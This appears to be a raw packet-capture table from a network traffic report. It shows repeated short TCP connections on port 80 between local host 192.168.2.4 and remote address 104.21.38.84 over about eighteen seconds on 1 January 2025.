Jan 1, 2025 14:53:32.211961031 CET	80	50100	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:32.212025881 CET	50100	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.212058067 CET	80	50107	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:32.212137938 CET	50107	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.212224007 CET	50107	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.217016935 CET	80	50107	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:32.558749914 CET	50107	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.563559055 CET	80	50107	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:32.689398050 CET	80	50107	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:32.730381012 CET	50107	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:32.958375931 CET	80	50107	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.011627913 CET	50107	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.084681988 CET	50107	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.085393906 CET	50113	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.089690924 CET	80	50107	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.089778900 CET	50107	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.090224981 CET	80	50113	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.090287924 CET	50113	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.090452909 CET	50113	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.095232964 CET	80	50113	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.449290991 CET	50113	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.454211950 CET	80	50113	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.512511015 CET	50113	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.513173103 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.518389940 CET	80	50113	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.518441916 CET	50113	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.519032955 CET	80	50117	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.519092083 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.519196033 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.524854898 CET	80	50117	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.637192965 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.642148018 CET	80	50120	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.643618107 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.645781994 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.650651932 CET	80	50120	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.871119976 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:33.876019955 CET	80	50117	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.876188993 CET	80	50117	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.964046955 CET	80	50117	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:33.996253014 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.001147985 CET	80	50120	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.011646032 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.098443985 CET	80	50120	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.151750088 CET	80	50117	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.152266026 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.199153900 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.360364914 CET	80	50120	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.403539896 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.473403931 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.473404884 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.475990057 CET	50126	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.478502035 CET	80	50120	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.478630066 CET	50120	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.478686094 CET	80	50117	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.478790998 CET	50117	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.480837107 CET	80	50126	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.481023073 CET	50126	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.481085062 CET	50126	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.485892057 CET	80	50126	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.839864969 CET	50126	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:34.844669104 CET	80	50126	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.944031000 CET	80	50126	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:34.996128082 CET	50126	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:35.199927092 CET	80	50126	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:35.246018887 CET	50126	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:35.317806959 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:35.322640896 CET	80	50132	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:35.322716951 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:35.322820902 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:35.327616930 CET	80	50132	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:35.668483019 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:35.673290014 CET	80	50132	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:35.767045975 CET	80	50132	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:35.808552027 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:35.946017981 CET	80	50132	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:35.996033907 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.073534012 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.074374914 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.078661919 CET	80	50132	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.078735113 CET	50132	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.079166889 CET	80	50138	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.079221010 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.079335928 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.084054947 CET	80	50138	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.433725119 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.438559055 CET	80	50138	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.524014950 CET	80	50138	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.574161053 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.697197914 CET	80	50138	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.746032953 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.817440987 CET	50126	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.818361044 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.819119930 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.823303938 CET	80	50138	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.823467970 CET	50138	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.823911905 CET	80	50139	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:36.824083090 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.824229002 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:36.828996897 CET	80	50139	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:37.183700085 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.188529968 CET	80	50139	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:37.291965008 CET	80	50139	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:37.339787960 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.543256044 CET	80	50139	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:37.589795113 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.662316084 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.663180113 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.667383909 CET	80	50139	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:37.667433977 CET	50139	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.667958021 CET	80	50140	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:37.668016911 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.668204069 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:37.673032999 CET	80	50140	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:38.027390957 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.034382105 CET	80	50140	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:38.160312891 CET	80	50140	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:38.214786053 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.423739910 CET	80	50140	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:38.483673096 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.552664042 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.555571079 CET	50141	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.558011055 CET	80	50140	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:38.558248997 CET	50140	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.560424089 CET	80	50141	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:38.564152956 CET	50141	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.564229965 CET	50141	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.568974972 CET	80	50141	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:38.919564962 CET	50141	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:38.924539089 CET	80	50141	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.037833929 CET	80	50141	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.089793921 CET	50141	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.153772116 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.154433012 CET	50141	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.158761978 CET	80	50142	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.158853054 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.159049034 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.159481049 CET	80	50141	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.159539938 CET	50141	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.163834095 CET	80	50142	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.290385962 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.295213938 CET	80	50143	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.295264959 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.295392990 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.300192118 CET	80	50143	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.511763096 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.516676903 CET	80	50142	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.516765118 CET	80	50142	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.637530088 CET	80	50142	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.652348042 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.657236099 CET	80	50143	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.683563948 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.749337912 CET	80	50143	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.795253992 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.806339025 CET	80	50142	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.855433941 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:39.922985077 CET	80	50143	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:39.964834929 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.037928104 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.038007975 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.038537025 CET	50144	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.043024063 CET	80	50142	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.043066025 CET	50142	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.043304920 CET	80	50143	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.043353081 CET	50143	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.043361902 CET	80	50144	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.043416977 CET	50144	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.043499947 CET	50144	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.048240900 CET	80	50144	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.403585911 CET	50144	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.408539057 CET	80	50144	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.491209030 CET	80	50144	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.543575048 CET	50144	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.662498951 CET	80	50144	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.665455103 CET	50144	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.670507908 CET	80	50144	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.675602913 CET	50144	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.787579060 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.792881012 CET	80	50145	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:40.795768976 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.795845032 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:40.800627947 CET	80	50145	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:41.152379990 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.157301903 CET	80	50145	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:41.250391006 CET	80	50145	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:41.292932034 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.526192904 CET	80	50145	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:41.574208975 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.648098946 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.648396969 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.653280973 CET	80	50145	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:41.653294086 CET	80	50146	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:41.653338909 CET	50145	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.653363943 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.653513908 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:41.658302069 CET	80	50146	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.011959076 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.016860962 CET	80	50146	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.096760035 CET	80	50146	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.152324915 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.272258043 CET	80	50146	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.326545954 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.394568920 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.397583961 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.399486065 CET	80	50146	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.399661064 CET	50146	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.402455091 CET	80	50147	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.402604103 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.402839899 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.407665968 CET	80	50147	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.761868954 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:42.766802073 CET	80	50147	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.880352020 CET	80	50147	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:42.933584929 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.039623022 CET	80	50147	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.089819908 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.161914110 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.162615061 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.166904926 CET	80	50147	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.167052031 CET	50147	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.167433023 CET	80	50148	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.167572021 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.167712927 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.172488928 CET	80	50148	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.511816025 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.516622066 CET	80	50148	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.654556036 CET	80	50148	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.699203014 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.822580099 CET	80	50148	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.871071100 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.945373058 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.945806980 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.950499058 CET	80	50148	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.950547934 CET	50148	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.950635910 CET	80	50149	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:43.950691938 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.950927973 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:43.955682039 CET	80	50149	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.309601068 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.314522028 CET	80	50149	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.423270941 CET	80	50149	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.465595961 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.668416977 CET	80	50149	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.717592955 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.785123110 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.789485931 CET	50150	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.790113926 CET	80	50149	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.790230989 CET	50149	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.796364069 CET	80	50150	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.796521902 CET	50150	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.796705961 CET	50150	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.801444054 CET	80	50150	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.813600063 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.813617945 CET	50150	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.818397045 CET	80	50151	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.821763992 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.821763992 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.826596022 CET	80	50151	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.862015009 CET	80	50150	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.929606915 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.934485912 CET	80	50152	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:44.937788010 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.937788010 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:44.942584991 CET	80	50152	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.166753054 CET	80	50150	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.169735909 CET	50150	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.173615932 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.178451061 CET	80	50151	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.178617001 CET	80	50151	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.275059938 CET	80	50151	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.297107935 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.301939011 CET	80	50152	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.324239016 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.385082960 CET	80	50152	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.433600903 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.529277086 CET	80	50151	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.569782019 CET	80	50152	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.574215889 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.621089935 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.696746111 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.696805954 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.697777987 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.701836109 CET	80	50151	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.701878071 CET	50151	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.702209949 CET	80	50152	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.702248096 CET	50152	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.702554941 CET	80	50153	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:45.702611923 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.702769041 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:45.707534075 CET	80	50153	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:46.058976889 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.063754082 CET	80	50153	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:46.160018921 CET	80	50153	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:46.214843035 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.420586109 CET	80	50153	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:46.464854002 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.536823988 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.537923098 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.542152882 CET	80	50153	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:46.542767048 CET	80	50154	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:46.542848110 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.542850018 CET	50153	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.543155909 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.547909021 CET	80	50154	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:46.904887915 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:46.909699917 CET	80	50154	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.008742094 CET	80	50154	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.058621883 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.287607908 CET	80	50154	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.339891911 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.419639111 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.420376062 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.424660921 CET	80	50154	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.424706936 CET	50154	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.425192118 CET	80	50155	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.425247908 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.425374985 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.430134058 CET	80	50155	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.786308050 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:47.791233063 CET	80	50155	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.899344921 CET	80	50155	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:47.949235916 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.067704916 CET	80	50155	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:48.121117115 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.320431948 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.325443029 CET	80	50155	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:48.325674057 CET	50155	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.326565027 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.331423998 CET	80	50156	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:48.331500053 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.331922054 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.336689949 CET	80	50156	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:48.685626984 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:48.690484047 CET	80	50156	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:48.794903040 CET	80	50156	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:48.841631889 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.049679995 CET	80	50156	104.21.38.84	192.168.2.4
Jan 1, 2025 14:53:49.089881897 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.160701036 CET	50156	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.161623955 CET	50157	80	192.168.2.4	104.21.38.84
Jan 1, 2025 14:53:49.165788889 CET	80	50156	104.21.38.84	192.168.2.4
